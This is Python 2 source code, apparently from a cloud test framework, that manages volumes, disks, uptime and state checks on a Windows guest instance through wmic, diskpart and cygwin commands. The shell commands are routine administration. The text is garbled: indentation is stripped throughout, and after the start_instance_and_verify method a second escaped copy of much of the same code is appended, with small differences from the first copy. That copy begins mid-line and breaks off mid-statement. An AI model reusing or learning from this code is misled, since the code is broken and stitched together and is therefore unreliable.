cloudlist=self.tester.get_volumes(attached_instance=self.id)
for x in xrange(0,maxdevs):
inuse=False
#double up the letter identifier to avoid exceeding z
if d == 'z':
prefix= prefix+'e'
dev = "/dev/"+prefix+str(d)
for avol in self.attached_vols:
if avol.attach_data.device == dev:
inuse = True
in_use_guest += str(avol.id)+", "
continue
#Check to see if the cloud has a conflict with this device name...
for vol in cloudlist:
vol.update()
if (vol.attach_data is not None) and (vol.attach_data.device == dev):
inuse = True
in_use_cloud += str(vol.id)+", "
continue
if inuse is False:
self.debug("Instance:"+str(self.id)+" returning available cloud scsi dev:"+str(dev))
return str(dev)
else:
d = chr(ord('e') + x) #increment the letter we append to the device string prefix
dev = None
if dev is None:
raise Exception("Could not find a free scsi dev on instance:"+self.id+", maxdevs:"+str(maxdevs)+"\nCloud_devs:"+str(in_use_cloud)+"\nGuest_devs:"+str(in_use_guest))
def detach_euvolume(self, euvolume, waitfordev=True, timeout=180):
'''
Method used to detach a volume from an instance and track its use by that instance
required - euvolume - the euvolume object being detached
waitfordev - boolean to indicate whether or not to poll guest instance for local device to be removed
optional - timeout - integer seconds to wait before timing out waiting for the volume to detach
'''
start = time.time()
elapsed = 0
found = True
for vol in self.attached_vols:
if vol.id == euvolume.id:
dev = vol.guestdev
if (self.tester.detach_volume(euvolume,timeout=timeout)):
if waitfordev:
self.debug("Cloud has detached" + str(vol.id) + ", Wait for device:"+str(dev)+" to be removed on guest...")
while (elapsed < timeout):
diskdrive_ids = []
try:
disk_drives = self.get_updated_diskdrive_info()
for disk in disk_drives:
if dev == disk.deviceid:
found = True
break
found = False
self.debug('Diskdrive associated with ' + str(vol.id) + ' has been removed from guest.')
#if device is not present remove it
self.attached_vols.remove(vol)
except Exception, de:
self.debug('Warning, error getting diskdrive id during detach:' + str(de))
if not found:
try:
self.rescan_disks(timeout=20)
except Exception, rde:
self.debug('Warning: Error while trying to rescan disks after detaching volume:' + str(rde))
try:
self.update_disk_info()
except Exception, ue:
self.debug('Warning: Error while trying to update disk info:' + str(ue))
try:
self.print_diskdrive_summary()
except: pass
self.debug('Volume:' + str(vol.id) + ', detached, and no longer found on guest at:' + str(dev))
vol.set_volume_detached_tags()
return True
time.sleep(10)
elapsed = int(time.time()-start)
diskdrive_ids = self.get_diskdrive_ids(drivelist=disk_drives)
self.debug('Current disk drives on guest:' + ",".join(str(x) for x in diskdrive_ids))
self.debug("Waiting for device '"+str(dev)+"' on guest to be removed.Elapsed:"+str(elapsed))
else:
self.attached_vols.remove(vol)
vol.set_volume_detached_tags()
return True
else:
raise Exception("Volume("+str(vol.id)+") failed to detach from device("+str(dev)+") on ("+str(self.id)+")")
raise Exception("Detach Volume("+str(euvolume.id)+") not found on ("+str(self.id)+")")
return False
def check_hostname(self):
if not hasattr(self, 'system_info'):
self.update_system_info()
if hasattr(self, 'system_info') and hasattr(self.system_info, 'host_name'):
if self.id.upper() == self.system_info.host_name.upper():
self.debug('Hostname:' + str(self.system_info.host_name) + ", instance.id:" + str(self.id))
else:
raise Exception('check_hostname failed: hostname:' + str(self.system_info.host_name).upper() +
" != id:" + str(self.id).upper())
else:
raise Exception('check_hostname failed: System_info.hostname not populated')
def get_process_list_brief(self):
'''
Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = "wmic process list brief /format:textvaluelist.xsl"
return self.get_parsed_wmic_command_output(cmd)
def get_process_list_full(self):
'''
Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = "wmic process list full"
return self.get_parsed_wmic_command_output(cmd)
def get_process_by_name(self,process_name):
'''
Attempts to look up a process on the remote guest.
param process_name: string. The name of the process to get info for
returns a dict representing the information returned from the remote guest
'''
cmd = 'wmic process ' + str(process_name) + ' get /format:textvaluelist.xsl'
result = self.get_parsed_wmic_command_output(cmd)
if result:
return result[0]
def get_services_list_brief(self):
'''
Returns a list of dicts representing the services from the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = 'wmic service list brief /format:textvaluelist.xsl'
return self.get_parsed_wmic_command_output(cmd)
def get_services_list_full(self):
'''
Returns a list of dicts representing the services from the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = 'wmic service list full'
return self.get_parsed_wmic_command_output(cmd)
def get_service_by_name(self,service_name):
'''
Attempts to lookup a service on the remote guest.
param service_name: string. The name of the service to get info
returns a dict representing the information returned from the remote guest
'''
cmd = 'wmic service ' + str(service_name) + ' get /format:textvaluelist.xsl'
result = self.get_parsed_wmic_command_output(cmd)
if result:
return result[0]
def get_memtotal_in_mb(self):
return long(self.system_info.total_physical_memory.split()[0].replace(',',''))
def get_memtotal_in_gb(self):
return long(self.get_memtotal_in_mb()/1024)
def check_ram_against_vmtype(self, pad=32):
total_ram = self.get_memtotal_in_mb()
self.debug('Ram check: vm_ram:' + str(self.vmtype_info.ram)
+ "mb vs memtotal:" + str(total_ram)
+ "mb. Diff:" + str(self.vmtype_info.ram - total_ram)
+ "mb, pad:" + str(pad) + "mb")
if not ((self.vmtype_info.ram - total_ram) <= pad):
raise Exception('Ram check failed. vm_ram:' + str(self.vmtype_info.ram)
+ " vs memtotal:" + str(total_ram) + ". Diff is greater than allowed pad:" + str(pad) + "mb")
else:
self.debug('check_ram_against_vmtype, passed')
def check_ephemeral_against_vmtype(self):
gb = self.gigabyte
size = self.vmtype_info.disk
ephemeral_dev = self.get_ephemeral_dev()
block_size = self.get_blockdev_size_in_bytes(ephemeral_dev)
gbs = block_size / gb
self.debug('Ephemeral check: ephem_dev:'
+ str(ephemeral_dev)
+ ", bytes:"
+ str(block_size)
+ ", gbs:"
+ str(gbs)
+ ", vmtype size:"
+ str(size))
if gbs != size:
raise Exception('Ephemeral check failed. ' + str(ephemeral_dev) + ' Blocksize: '
+ str(gbs) + "gb (" + str(block_size) + "bytes)"
+ ' != vmtype size:' +str(size) + "gb")
else:
self.debug('check_ephemeral_against_vmtype, passed')
return ephemeral_dev
def get_ephemeral_dev(self):
"""
Attempts to find the block device path on this instance
:return: string representing path to ephemeral block device
"""
ephem_name = None
dev_prefixs = ['s','v','xd','xvd']
if not self.root_device_type == 'ebs':
try:
self.assertFilePresent('/dev/' + str(self.rootfs_device))
return self.rootfs_device
except:
ephem_name = 'da'
else:
ephem_name = 'db'
devs = self.get_dev_dir()
for prefix in dev_prefixs:
if str(prefix+ephem_name) in devs:
return str('/dev/'+prefix+ephem_name)
raise Exception('Could not find ephemeral device?')
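# Sketch: for an EBS-backed root this typically resolves to something like /dev/sdb or
# /dev/vdb (prefix + 'db'); for instance-store roots it falls back to the rootfs device
# or prefix + 'da'. Exact names depend on the guest's device naming.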
def cygwin_cmd(self, cmd, timeout=120, verbose=False, code=None):
cmd = self.get_cygwin_path() + '\\bin\\bash.exe --login -c "' + str(cmd) + '"'
return self.sys(cmd,timeout=timeout, verbose=verbose, code=code)
def get_dev_md5(self, devpath, length, timeout=60):
self.assertCygwinFilePresent(devpath)
if length == 0:
md5 = str(self.cygwin_cmd('md5sum ' + devpath, timeout=timeout)[0]).split(' ')[0].strip()
else:
md5 = str(self.cygwin_cmd("head -c " + str(length) + " " + str(devpath) + " | md5sum")[0]).split(' ')[0].strip()
return md5
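# e.g. get_dev_md5('/dev/sda', 1024) effectively runs "head -c 1024 /dev/sda | md5sum"
# inside cygwin and returns the checksum string; a length of 0 checksums the whole device.
# (The device path shown is only an illustration.)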
def update_cygwin_windows_device_map(self, prefix='/dev/*', force_update=False):
cygwin_dev_map = {}
if not force_update:
if self.cygwin_dev_map:
if time.time() - self.cygwin_dev_map['last_updated'] <= 30:
cygwin_dev_map = self.cygwin_dev_map
if not cygwin_dev_map:
self.debug('Updating cygwin to windows device mapping...')
output = self.cygwin_cmd("for DEV in " + prefix + " ; do printf $DEV=$(cygpath -w $DEV); echo ''; done",
verbose=False, code=0)
for line in output:
if re.match(prefix, line):
split = line.split('=')
key = split.pop(0)
if split:
value = split.pop()
else:
value = ''
cygwin_dev_map[key]=value
cygwin_dev_map['last_updated'] = time.time()
self.cygwin_dev_map = cygwin_dev_map
self.debug('Updated cygwin to windows device mapping')
return cygwin_dev_map
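# The resulting map is keyed by cygwin device path with the Windows path as the value
# (e.g. something like {'/dev/sda': '\\.\PHYSICALDRIVE0', ...}; exact values depend on the
# guest), plus a 'last_updated' timestamp used to throttle refreshes to every 30 seconds.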
def rescan_disks(self, timeout=20):
'''
Attempts to rescan disks on the guest. This may help expedite updates/discovery when attaching/detaching
volumes to the guest. This has also been found to hang post device removal so is used with a 20 second
command timeout as the default.
param timeout: integer. Seconds to wait on command before failing
'''
scriptname = 'eutester_diskpart_script'
self.sys('(echo rescan && echo list disk ) > ' + str(scriptname), code=0)
self.sys('diskpart /s ' + str(scriptname), code=0, timeout=timeout)
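# The generated diskpart script simply contains the two lines 'rescan' and 'list disk';
# running it via 'diskpart /s' makes the guest rescan its buses for device changes.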
def get_diskdrive_for_volume(self, volume):
if not self.is_volume_attached_to_this_instance(volume):
return None
ret_disk = None
for disk in self.diskdrives:
disk.update_ebs_info()
if disk.ebs_volume == volume.id:
ret_disk = disk
if not ret_disk:
ret_disk = self.find_diskdrive_for_volume_by_serial_number(volume, force_check=True)
if not ret_disk:
if hasattr(volume,'md5') and volume.md5:
ret_disk = self.find_diskdrive_for_volume_by_md5(volume, force_check=True)
return ret_disk
def find_diskdrive_for_volume_by_md5(self, volume, md5=None, length=None, force_check=False):
if not force_check and not self.is_volume_attached_to_this_instance(volume):
return None
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume=volume,tester=self.tester)
md5 = md5 or volume.md5
if not md5:
return None
length = length or volume.md5len
for disk in self.diskdrives:
if disk.cygwin_scsi_drive:
disk_md5 = self.get_dev_md5(disk.cygwin_scsi_drive, length=length)
if disk_md5 == md5:
volume.guestdev = disk.deviceid
volume.md5 = disk_md5
volume.md5len = length
disk.ebs_volume = volume.id
return disk
return None
def find_diskdrive_for_volume_by_serial_number(self, volume, serial_number=None, force_check=False):
'''
Attempt to iterate through all the diskdrives we're aware of. If a diskdrive is found with a serial_number
associated with the volume, return that diskdrive obj..
example serial number format: vol-81C13EA4-dev-sdg
:param volume: volume obj to use for deriving the serial_number
:param serial_number: string. Optional. The string representing the serial # to match.
:returns WinInstanceDiskDrive if found, else None
'''
if not force_check and not self.is_volume_attached_to_this_instance(volume):
return None
if not serial_number:
serial_number = volume.id + volume.attach_data.device.replace('/','-')
for disk in self.diskdrives:
if disk.serialnumber == serial_number:
return disk
return None
def is_volume_attached_to_this_instance(self, volume):
'''
Attempts to look up volume state per cloud to confirm the cloud believes the state of this volume is attached
to this instance. This does not verify the guest/hypervisor also believes the volume is attached.
:param volume: volume obj.
:returns boolean
'''
volume.update()
if hasattr(volume, 'attach_data') and volume.attach_data and (volume.attach_data.instance_id == self.id):
self.debug('Volume:' + str(volume.id) + " is attached to this instance: " + str(self.id) + " per cloud perspective")
return True
else:
self.debug('Volume:' + str(volume.id) + " is NOT attached to this instance: " + str(self.id) + " per cloud perspective")
return False
def update_volume_guest_info(self, volume, md5=None, md5len=None, guestdev=None):
self.debug("{0} update_volume_guest_info: {1} {2}"
.format(termline, volume, termline))
if not self.is_volume_attached_to_this_instance(volume):
raise Exception('Volume not attached to this instance')
disk = None
if not self.get_volume_from_attached_list_by_id(volume.id):
self.attached_vols.append(volume)
volume.guestdev = guestdev or volume.guestdev
if md5:
if not md5len:
raise Exception('Must provide md5len if providing the md5')
volume.md5 = md5
volume.md5len = md5len
else:
disk = self.get_diskdrive_for_volume(volume)
if not disk:
raise Exception('Could not find diskdrive for volume when attempting to update volume guest info:' + str(volume))
volume.md5len = md5len or 1024
volume.md5 = self.get_dev_md5(disk.cygwin_scsi_drive, volume.md5len)
if not guestdev:
volume.guestdev = disk.deviceid
disk = disk or self.get_diskdrive_for_volume(volume)
disk.update_ebs_info()
volume.update_volume_attach_info_tags(md5=volume.md5, md5len=volume.md5len, instance_id=self.id, guestdev=volume.guestdev)
return volume
def get_unsynced_volumes(self, check_md5=True):
'''
Description: Returns list of volumes which are:
-in a state the cloud believes the vol is no longer attached
-the attached device has changed, or is not found.
If all euvols are shown as attached to this instance, and the last known local dev is present and/or a local device is found with matching md5 checksum
then the list will return 'None' as all volumes are successfully attached and state is in sync.
By default this method will iterate through all the known euvolumes attached to this euinstance.
A subset can be provided in the list argument 'euvol_list'.
Returns a list of euvolumes for which a corresponding guest device could not be found, or the cloud no longer believes is attached.
:param euvol_list: - optional - euvolume object list. Defaults to all self.attached_vols
:param md5length: - optional - defaults to the length given in each euvolume. Used to calc md5 checksum of devices
:param timerpervolume: -optional - time to wait for device to appear, per volume before failing
:param min_polls: - optional - minimum iterations to check guest devs before failing, despite timeout
:param check_md5: - optional - find devices by md5 comparison. Default is to only perform this check when virtio_blk is in use.
'''
bad_list = []
retdict = self.sync_attached_volumes_with_clouds_view()
bad_list.extend(retdict['badvols'])
return bad_list
def reboot_instance_and_verify(self,
waitconnect=60,
timeout=600,
wait_for_ports=180,
connect=True,
checkvolstatus=False,
pad=5,
uptime_retries=3):
'''
Attempts to reboot an instance and verify its state post reboot.
waitconnect - optional - integer, seconds to wait before attempting to connect to the instance after reboot
timeout - optional - integer, seconds. Overall time allowed for reconnecting and verifying the new uptime before failing
wait_for_ports - optional - integer, seconds to poll the rdp and winrm ports before attempting to connect anyway
connect - optional - boolean to indicate whether a remote shell session should be established once the expected state has been reached
checkvolstatus - optional - boolean used to check volume status before reboot and post start up
pad - optional - integer, seconds of slack allowed when comparing the new uptime against the original uptime plus elapsed time
'''
msg=""
newuptime = None
attempt = 0
def get_safe_uptime():
uptime = None
try:
uptime = self.get_uptime()
except: pass
return uptime
self.debug('Attempting to reboot instance:'+str(self.id)+', check attached volume state first')
uptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)
elapsed = 0
start = time.time()
if checkvolstatus:
#update the md5sums per volume before reboot
bad_vols=self.get_unsynced_volumes()
if bad_vols != []:
for bv in bad_vols:
self.debug(str(self.id)+'Unsynced volume found:'+str(bv.id))
raise Exception(str(self.id)+"Could not reboot using checkvolstatus flag due to unsync'd volumes")
self.debug('Rebooting now...')
self.reboot()
time.sleep(waitconnect)
try:
self.poll_for_ports_status(ports=[self.rdp_port, self.winrm_port], timeout=wait_for_ports)
except:
self.debug('Failed to poll winrm and rdp ports after ' + str(wait_for_ports) + ' seconds, try to connect anyways...')
timeout=timeout - int(time.time()-start)
while (elapsed < timeout):
self.connect_to_instance(timeout=timeout)
#Wait for the system to provide a valid response for uptime, early connections may not
newuptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)
elapsed = int(time.time()-start)
#A reboot should leave the new uptime at least 'pad' seconds less than the original uptime plus elapsed time
if newuptime > (uptime + elapsed) - pad:
err_msg = "Instance uptime does not represent a reboot. Orig:"+str(uptime)+\
", New:"+str(newuptime)+", elapsed:"+str(elapsed)+"/"+str(timeout)
if elapsed > timeout:
raise Exception(err_msg)
else:
self.debug(err_msg)
else:
self.debug("Instance uptime indicates a reboot. Orig:"+str(uptime)+\
", New:"+str(newuptime)+", elapsed:"+str(elapsed))
break
if checkvolstatus:
badvols= self.get_unsynced_volumes()
if badvols != []:
for vol in badvols:
msg = msg+"\nVolume:"+vol.id+" Local Dev:"+vol.guestdev
raise Exception("Missing volumes post reboot:"+str(msg)+"\n")
self.debug(self.id+" reboot_instance_and_verify Success")
def get_uptime(self):
if not hasattr(self, 'system_info'):
self.update_system_info()
if hasattr(self.system_info, 'system_boot_time'):
return self._get_uptime_from_system_boot_time()
elif hasattr(self.system_info, 'system_up_time'):
return self._get_uptime_from_system_up_time()
else:
tb = self.tester.get_traceback()
raise Exception(str(tb) + '\nCould not get system boot or up time from system_info')
def _get_uptime_from_system_boot_time(self):
#11/18/2013, 3:15:39 PM
if not hasattr(self, 'system_info'):
self.update_system_info()
splitdate = self.system_info.system_boot_time.split()
datestring = splitdate[0]
timestring = splitdate[1]
ampm = splitdate[2]
month, day, year = datestring.replace(',',"").split('/')
hours, minutes, seconds = timestring.split(':')
#Convert the 12-hour clock to 24-hour: 12 AM -> 0, 12 PM -> 12, 1-11 PM -> 13-23
hours = int(hours) % 12
if ampm == 'PM':
hours = hours + 12
datetimestring = str(year) + " " + \
str(month) + " " + \
str(day) + " " + \
str(hours) + " " + \
str(minutes) + " " + \
str(seconds)
dt = datetime.strptime(datetimestring, "%Y %m %d %H %M %S")
return int(time.time() - time.mktime(dt.timetuple()))
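# Worked example (hypothetical output): a system_boot_time of '11/18/2013, 3:15:39 PM' splits into
# date '11/18/2013', time '3:15:39' and 'PM', is rebuilt as '2013 11 18 15 15 39' and parsed with
# '%Y %m %d %H %M %S'; uptime is then the current time minus that boot time, in whole seconds.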
def _get_uptime_from_system_up_time(self):
#0 Days, 0 Hours, 6 Minutes, 39 Seconds
if not hasattr(self, 'system_info'):
self.update_system_info()
uptime_string = self.system_info.system_up_time
days = 0
hours = 0
minutes = 0
seconds = 0
split = uptime_string.split(',')
for part in split:
time_string = ""
if re.search('Days', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
days = int(time_string or 0)
elif re.search('Hours', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
hours = int(time_string or 0)
elif re.search('Minutes', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
minutes = int(time_string or 0)
elif re.search('Seconds', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
seconds = int(time_string or 0)
self.debug("Days:" +str(days)+', Hours:'+ str(hours) + ", Minutes:" + str(minutes) + ", Seconds:" + str(seconds))
uptime = (days * 86400) + (hours * 3600) + (minutes * 60) + seconds
return uptime
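# Worked example (from the sample format above): '0 Days, 0 Hours, 6 Minutes, 39 Seconds' yields
# uptime = 0*86400 + 0*3600 + 6*60 + 39 = 399 seconds.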
def stop_instance_and_verify(self, timeout=200, state='stopped',
failstate='terminated', check_vols=True):
'''
Attempts to stop the instance and verify it has reached the expected
stopped state
:param timeout: -optional- time to wait on instance to go to state 'state' before failing
:param state: -optional- the expected state to signify success, default is stopped
:param failstate: -optional- a state transition that indicates failure, default is terminated
:param check_vols: -optional- boolean, verify attached volumes remain 'in-use' after the stop
'''
self.debug(self.id+" Attempting to stop instance...")
start = time.time()
elapsed = 0
self.stop()
while (elapsed < timeout):
time.sleep(2)
self.update()
if self.state == state:
break
if self.state == failstate:
raise Exception(str(self.id) + " instance went to state:" +
str(self.state) + " while stopping")
elapsed = int(time.time()- start)
if elapsed % 10 == 0 :
self.debug(str(self.id) + " wait for stop, in state:" +
str(self.state) + ",time remaining:" +
str(elapsed) + "/" + str(timeout) )
if self.state != state:
raise Exception(self.id + " state: " + str(self.state) +
" expected:" + str(state) +
", after elapsed:" + str(elapsed))
if check_vols:
for volume in self.attached_vols:
volume.update()
if volume.status != 'in-use':
raise Exception(str(self.id) + ', Volume ' +
str(volume.id) + ':' + str(volume.status)
+ ' state did not remain in-use '
'during stop')
self.debug(self.id + " stop_instance_and_verify Success")
def start_instance_and_verify(self, timeout=300, state = 'running',
failstates=['terminated'], failfasttime=30,
connect=True, checkvolstatus=True):
'''
Attempts to start instance and verify state, and reconnects ssh session
:param timeout: -optional-time to wait on instance to go to state
'state' before failing
:param state: -optional-the expected state to signify success,
default is running
:param failstates: -optional- list of state transitions that indicate
failure, default is ['terminated']
:param failfasttime: -optional- seconds of elapsed time after which the
fail states start being checked on each poll
:param connect: -optional - boolean to indicate whether an ssh
session should be established once the expected state
has been reached
:param checkvolstatus: -optional -boolean to be used to check volume
status post start up
'''
self.debug(self.id+" Attempting to start instance...")
if checkvolstatus:
for volume in self.attached_vols:
volume.update()
if volume.status != 'in-use':
raise Exception(str(self.id) + ', Volume ' + str(volume.id) + ':' + str(volume.status)
+ ' state did not remain in-use during stop' )
self.debug("\n"+ str(self.id) + ": Printing Instance 'attached_vol' list:\n")
self.tester.show_volumes(self.attached_vols)
msg=""
start = time.time()
elapsed = 0
self.update()
#Add fail fast states...
#Copy the list first so the mutable default argument is not modified across calls
failstates = list(failstates)
if self.state == 'stopped':
failstates.extend(['stopped','stopping'])
self.start()
while (elapsed < timeout):
elapsed = int(time.time()- start)
self.update()
self.debug(str(self.id) + " wait for start, in state:" +
str(self.state) + ",time remaining:" + str(elapsed) +
"/"+str(timeout) )
if self.state == state:
break
if elapsed >= failfasttime:
for failstate in failstates:
if self.state == failstate:
raise Exception(str(self.id) +
" instance went to state:" +
str(self.state) + " while starting")
time.sleep(10)
if self.state != state:
raise Exception(self.id + " not in " + str(state) +
" state after elapsed:" + str(elapsed))
else:
self.debug(self.id + " went to state:" + str(state))
if connect:
self.connect_to_instance(timeout=timeout)
if checkvolstatus:
badvols= self.get_unsynced_volumes(check_md5=True)
if badvols != []:
for vol in badvols:
msg = msg + "\nVolume:" + vol.id + " Local Dev:" +\
vol.guestdev
raise Exception("Missing volumes post reboot:" + str(msg) +
"\n")
self.debug(self.id+" start_instance_and_verify Success")
remove it\n self.attached_vols.remove(vol)\n\n except Exception, de:\n self.debug('Warning, error getting diskdrive id during detach:' + str(de))\n if not found:\n try:\n self.rescan_disks(timeout=20)\n except Exception, re:\n self.debug('Warning: Error while trying to rescan disks after detaching volume:' + str(re))\n try:\n self.update_disk_info()\n except Exception, ue:\n self.debug('Warning: Error while trying to update disk info:' + str(ue))\n try:\n self.print_diskdrive_summary()\n except: pass\n self.debug('Volume:' + str(vol.id) + ', detached, and no longer found on guest at:' + str(dev))\n vol.set_volume_detached_tags()\n return True\n time.sleep(10)\n elapsed = int(time.time()-start)\n diskdrive_ids = self.get_diskdrive_ids(drivelist=disk_drives)\n self.debug('Current disk drives on guest:' + \",\".join(str(x) for x in diskdrive_ids))\n self.debug(\"Waiting for device '\"+str(dev)+\"' on guest to be removed.Elapsed:\"+str(elapsed))\n\n else:\n self.attached_vols.remove(vol)\n vol.set_volume_detached_tags()\n return True\n else:\n raise Exception(\"Volume(\"+str(vol.id)+\") failed to detach from device(\"+str(dev)+\") on (\"+str(self.id)+\")\")\n\n raise Exception(\"Detach Volume(\"+str(euvolume.id)+\") not found on (\"+str(self.id)+\")\")\n return False\n\n def check_hostname(self):\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n if hasattr(self, 'system_info') and hasattr(self.system_info, 'host_name'):\n if self.id.upper() == self.system_info.host_name.upper():\n self.debug('Hostname:' + str(self.id) + \", instance.id:\" + str(self.system_info.host_name))\n else:\n raise Exception('check_hostname failed: hostname:' + str(self.system_info.host_name).upper() +\n \" != id:\" + str(self.id).upper())\n else:\n raise Exception('check_hostname failed: System_info.hostname not populated')\n\n def get_process_list_brief(self):\n '''\n Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a\n dict containing information about the service.\n '''\n cmd = \"wmic process list brief /format:textvaluelist.xsl\"\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_process_list_full(self):\n '''\n Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a\n dict containing information about the service.\n '''\n cmd = \"wmic process list full\"\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_process_by_name(self,process_name):\n '''\n Attempts to lookup a service on the remote guest.\n param service_name: string. The name of the service to get info\n returns a dict representing the information returned from the remote guest\n '''\n cmd = 'wmic process ' + str(process_name) + ' get /format:textvaluelist.xsl'\n result = self.get_parsed_wmic_command_output(cmd)\n if result:\n return result[0]\n\n def get_services_list_brief(self):\n '''\n Returns a list of dicts representing the services from the remote guest. Each service is represented by a\n dict containing information about the service.\n '''\n cmd = 'wmic service list brief /format:textvaluelist.xsl'\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_services_list_full(self):\n '''\n Returns a list of dicts representing the services from the remote guest. 
Each service is represented by a\n dict containing information about the service.\n '''\n cmd = 'wmic service list full'\n return self.get_parsed_wmic_command_output(cmd)\n\n def get_service_by_name(self,service_name):\n '''\n Attempts to lookup a service on the remote guest.\n param service_name: string. The name of the service to get info\n returns a dict representing the information returned from the remote guest\n '''\n cmd = 'wmic service ' + str(service_name) + ' get /format:textvaluelist.xsl'\n result = self.get_parsed_wmic_command_output(cmd)\n if result:\n return result[0]\n\n def get_memtotal_in_mb(self):\n return long(self.system_info.total_physical_memory.split()[0].replace(',',''))\n\n def get_memtotal_in_gb(self):\n return long(self.get_memtotal_in_mb()/1024)\n\n def check_ram_against_vmtype(self, pad=32):\n total_ram = self.get_memtotal_in_mb()\n self.debug('Ram check: vm_ram:' + str(self.vmtype_info.ram)\n + \"mb vs memtotal:\" + str(total_ram)\n + \"mb. Diff:\" + str(self.vmtype_info.ram - total_ram)\n + \"mb, pad:\" + str(pad) + \"mb\")\n if not ((self.vmtype_info.ram - total_ram) <= pad):\n raise Exception('Ram check failed. vm_ram:' + str(self.vmtype_info.ram)\n + \" vs memtotal:\" + str(total_ram) + \". Diff is greater than allowed pad:\" + str(pad) + \"mb\")\n else:\n self.debug('check_ram_against_vmtype, passed')\n\n def check_ephemeral_against_vmtype(self):\n gb = self.gigabyte\n size = self.vmtype_info.disk\n ephemeral_dev = self.get_ephemeral_dev()\n block_size = self.get_blockdev_size_in_bytes(ephemeral_dev)\n gbs = block_size / gb\n self.debug('Ephemeral check: ephem_dev:'\n + str(ephemeral_dev)\n + \", bytes:\"\n + str(block_size)\n + \", gbs:\"\n + str(gbs)\n + \", vmtype size:\"\n + str(size))\n if gbs != size:\n raise Exception('Ephemeral check failed. 
' + str(ephemeral_dev) + ' Blocksize: '\n + str(gbs) + \"gb (\" + str(block_size) + \"bytes)\"\n + ' != vmtype size:' +str(size) + \"gb\")\n else:\n self.debug('check_ephemeral_against_vmtype, passed')\n return ephemeral_dev\n\n def get_ephemeral_dev(self):\n \"\"\"\n Attempts to find the block device path on this instance\n\n :return: string representing path to ephemeral block device\n \"\"\"\n ephem_name = None\n dev_prefixs = ['s','v','xd','xvd']\n if not self.root_device_type == 'ebs':\n try:\n self.assertFilePresent('/dev/' + str(self.rootfs_device))\n return self.rootfs_device\n except:\n ephem_name = 'da'\n else:\n ephem_name = 'db'\n devs = self.get_dev_dir()\n for prefix in dev_prefixs:\n if str(prefix+ephem_name) in devs:\n return str('/dev/'+prefix+ephem_name)\n raise Exception('Could not find ephemeral device?')\n\n\n def cygwin_cmd(self, cmd, timeout=120, verbose=False, code=None):\n cmd = self.get_cygwin_path() + '\\\\bin\\\\bash.exe --login -c \"' + str(cmd) + '\"'\n return self.sys(cmd,timeout=timeout, verbose=verbose, code=code)\n\n def get_dev_md5(self, devpath, length, timeout=60):\n self.assertCygwinFilePresent(devpath)\n if length == 0:\n md5 = str(self.cygwin_cmd('md5sum ' + devpath, timeout=timeout)[0]).split(' ')[0].strip()\n else:\n md5 = str(self.cygwin_cmd(\"head -c \" + str(length) + \" \" + str(devpath) + \" | md5sum\")[0]).split(' ')[0].strip()\n return md5\n\n\n def update_cygwin_windows_device_map(self, prefix='/dev/*', force_update=False):\n cygwin_dev_map = {}\n if not force_update:\n if self.cygwin_dev_map:\n if time.time() - self.cygwin_dev_map['last_updated'] <= 30:\n cygwin_dev_map = self.cygwin_dev_map\n if not cygwin_dev_map:\n self.debug('Updating cygwin to windows device mapping...')\n output = self.cygwin_cmd(\"for DEV in \" + prefix + \" ; do printf $DEV=$(cygpath -w $DEV); echo ''; done\",\n verbose=False, code=0)\n for line in output:\n if re.match(prefix, line):\n split = line.split('=')\n key = split.pop(0)\n if split:\n value = split.pop()\n else:\n value = ''\n cygwin_dev_map[key]=value\n cygwin_dev_map['last_updated'] = time.time()\n self.cygwin_dev_map = cygwin_dev_map\n self.debug('Updated cygwin to windows device mapping')\n return cygwin_dev_map\n\n\n def rescan_disks(self, timeout=20):\n '''\n Attempts to rescan disks on the guest. This may help expedite updates/discovery when attaching/detaching\n volumes to the guest. This has also been found to hang post device removal so is used with a 20 second\n command timeout as the default.\n param timeout: integer. 
Seconds to wait on command before failing\n '''\n scriptname = 'eutester_diskpart_script'\n self.sys('(echo rescan && echo list disk ) > ' + str(scriptname), code=0)\n self.sys('diskpart /s ' + str(scriptname), code=0, timeout=timeout)\n\n\n def get_diskdrive_for_volume(self, volume):\n if not self.is_volume_attached_to_this_instance(volume):\n return None\n ret_disk = None\n for disk in self.diskdrives:\n disk.update_ebs_info()\n if disk.ebs_volume == volume.id:\n ret_disk = disk\n if not ret_disk:\n ret_disk = self.find_diskdrive_for_volume_by_serial_number(volume, force_check=True)\n if not ret_disk:\n if hasattr(volume,'md5') and volume.md5:\n ret_disk = self.find_diskdrive_for_volume_by_md5(volume, force_check=True)\n return ret_disk\n\n\n\n def find_diskdrive_for_volume_by_md5(self, volume, md5=None, length=None, force_check=False):\n if not force_check and not self.is_volume_attached_to_this_instance(volume):\n return None\n if not isinstance(volume, EuVolume):\n volume = EuVolume.make_euvol_from_vol(volume=volume,tester=self.tester)\n md5 = md5 or volume.md5\n if not md5:\n return None\n length = length or volume.md5len\n for disk in self.diskdrives:\n if disk.cygwin_scsi_drive:\n disk_md5 = self.get_dev_md5(disk.cygwin_scsi_drive, length=length)\n if disk_md5 == md5:\n volume.guestdev = disk.deviceid\n volume.md5 = disk_md5\n volume.md5len = length\n disk.ebs_volume = volume.id\n return disk\n return None\n\n\n\n def find_diskdrive_for_volume_by_serial_number(self, volume, serial_number=None, force_check=False):\n '''\n Attempt to iterate through all the diskdrives were aware of. If a diskdrive is found with a serial_number\n associated with the volume, return that diskdrive obj..\n example serial number format: vol-81C13EA4-dev-sdg\n\n :param volume: volume obj to use for deriving the serial_number\n :param serial_number: string. Optional. The string representing the serial # to match.\n :returns WinInstanceDiskDrive if found, else None\n '''\n if not force_check and not self.is_volume_attached_to_this_instance(volume):\n return None\n if not serial_number:\n serial_number = volume.id + volume.attach_data.device.replace('/','-')\n for disk in self.diskdrives:\n if disk.serialnumber 